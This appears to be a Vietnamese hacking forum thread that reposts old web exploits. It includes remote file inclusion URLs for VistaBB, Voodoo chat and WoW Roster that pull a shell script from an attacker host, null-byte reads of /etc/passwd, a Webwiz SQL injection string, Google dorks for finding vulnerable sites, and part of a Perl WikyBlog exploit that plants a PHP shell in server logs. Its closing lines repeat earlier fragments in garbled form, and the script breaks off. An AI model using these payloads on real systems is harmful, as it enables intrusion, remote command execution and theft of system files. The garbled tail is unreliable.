Hoặc exploit bằng tay : Trích: GET -> http://[site]/[vistabbpath]/includes/functions_mod_user.php?phpbb_root_path=[FI LE] EXAMPLE -> http://[site]/[vistabbpath]/includes/functions_mod_user.php?phpbb_root_path=http ://yoursite.com/cmd.txt? EXAMPLE -> http://[site]/[vistabbpath]/includes/functions_mod_user.php?phpbb_root_path=/etc/ passwd%00 <- mq off GET -> http://[site]/[vistabbpath]/includes/functions_portal.php?phpbb_root_path=[FILE] EXAMPLE -> http://[site]/[vistabbpath]/includes/functions_portal.php?phpbb_root_path=http://yo ursite.com/cmd.txt? EXAMPLE -> http://[site]/[vistabbpath]/includes/functions_portal.php?phpbb_root_path=/etc/pas swd%00 <- mq off Ask Google : "Powered by VistaBB" Còn đây là Source cho những ai muốn ngâm kíu hoặc "dùng thử" http://www.vistabb.net/dosyalar/zip_vistabb_v2060.zip navaro(HCE) Voodoo chat <= 1.0RC1b (file_path) Remote File Inclusion Vulnerability Code: Title : WoW Roster <= 1.5.1 Remote File Include Vulnerabilities ################################################################## ############# Discovered By Skulmatic Affected software description : ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Application : World of Warcraft (WoW) Roster URL : http://www.wowroster.net/ dork : "wow roster version 1.5.*" Exploit : http://[target]/[wow_roster_path]/conf.php?subdir=http://[attacker]/cmd.txt?&cmd =ls greatz: ~~~~ # special to song hye kyo (for inspiration) # To all members of #papmahackerlink and #hackid, OLiBekaS, cgibin, weleh, skulmatic, sikunYuk, brokencode, ulga, SaMuR4i_X, bigmaster. Contact: ~~~~~~ Nick: skulmatic E-mail: skulmatic[at]gmail[dot]Com [ eof ] # milw0rm.com [2006-08-01] vns3curity(HCE) Webwiz SQL Injection -Version: All -PoC: site/forumpath/search.asp?KM=' Have fun! Marriotvn(HCE) Webwiz SQL Injection -Version: All -PoC: site/forumpath/search.asp?KM=' Have fun! Marriotvn(HCE) WikyBlog 1.3.2 (include/WBmap.php) Local File Inclusion Code: ################################################################## ############################### # r0ut3r Presents # # # # Another r0ut3r discovery! # # writ3r [at] gmail.com # # # # WikyBlog Local File Inclusion Exploit # ################################################################## ############################### # Software: WikyBlog 1.3 # # # # Vendor: http://www.wikyblog.com/ # # # # Released: 2006/12/01 # # # # Discovered & Exploit By: r0ut3r (writ3r [at] gmail.com) # # # # Note: The information provided in this document is for WikyBlog administrator # # testing purposes only! # # # # This exploit makes use of a local file inclusion exploit in # # WikyBlog to allow command execution. Firstly it locates an # # access_log, or error_log then it inserts a PHP Shell into # # the log file and returns a link for command execution. # # # # include/WBmap.php?l=file_to_include%00 # # register_globals being on does not affect this vulnerability # ################################################################## ############################### use IO::Socket; use Switch; $port = "80"; # connection port $target = @ARGV[0]; # localhost $folder = @ARGV[1]; # /wikyblog/ sub Header() { print q {################################################################# ################################ # r0ut3r Presents # # # # Another r0ut3r discovery! # # writ3r [at] gmail.com # # # # WikyBlog Local File Inclusion Exploit # ################################################################## ############################### }; } sub Usage() { print q {Usage: wikyblogxpl1.3.pl [target] [folder] Example: wikyblogxpl1.3.pl localhost /wikyblog/ }; exit(); } Header(); if (!$target || !$folder) { Usage(); } # log list taken from Kacper's http://www.milw0rm.com/exploits/2253 @paths=( " / / / / /var/log/httpd/access_log", " / / / / /var/log/httpd/error_log", " /apache/logs/error.log", " /apache/logs/access.log", " / /apache/logs/error.log", " / /apache/logs/access.log", " / / /apache/logs/error.log", " / / /apache/logs/access.log", " / / / /apache/logs/error.log", " / / / /apache/logs/access.log", " / / / / /apache/logs/error.log", " / / / / /apache/logs/access.log", " /logs/error.log", " /logs/access.log", " / /logs/error.log", " / /logs/access.log", " / / /logs/error.log", " / / /logs/access.log", " / / / /logs/error.log", " / / / /logs/access.log", " / / / / /logs/error.log", " / / / / /logs/access.log", " / / / / /etc/httpd/logs/access_log", " / / / / /etc/httpd/logs/access.log", " / / / / /etc/httpd/logs/error_log", " / / / / /etc/httpd/logs/error.log", " / / / / /var/www/logs/access_log", " / / / / /var/www/logs/access.log", " / / / / /usr/local/apache/logs/access_log", " / / / / /usr/local/apache/logs/access.log", " / / / / /var/log/apache/access_log", " / / / / /var/log/apache/access.log", " / / / / /var/log/access_log", " / / / / /var/www/logs/error_log", " / / / / /var/www/logs/error.log", " / / / / /usr/local/apache/logs/error_log", " / / / / /usr/local/apache/logs/error.log", " / / / / /var/log/apache/error_log", " / / / / /var/log/apache/error.log", " / / / / /var/log/access_log", " / / / / /var/log/error_log" ); print "[+] Attempting to locate log file\n"; $log = ""; foreach $path (@paths) { . http://[target]/[wow_roster_path]/conf.php?subdir=http://[attacker]/cmd.txt?&cmd =ls greatz: ~~~~ # special to song hye kyo (for inspiration) # To all members of #papmahackerlink and #hackid, OLiBekaS, cgibin, weleh, skulmatic, sikunYuk, brokencode, ulga, SaMuR4i_X,. & Exploit By: r0ut3r (writ3r [at] gmail.com) # # # # Note: The information provided in this document is for WikyBlog administrator # # testing purposes only! # # # # This exploit makes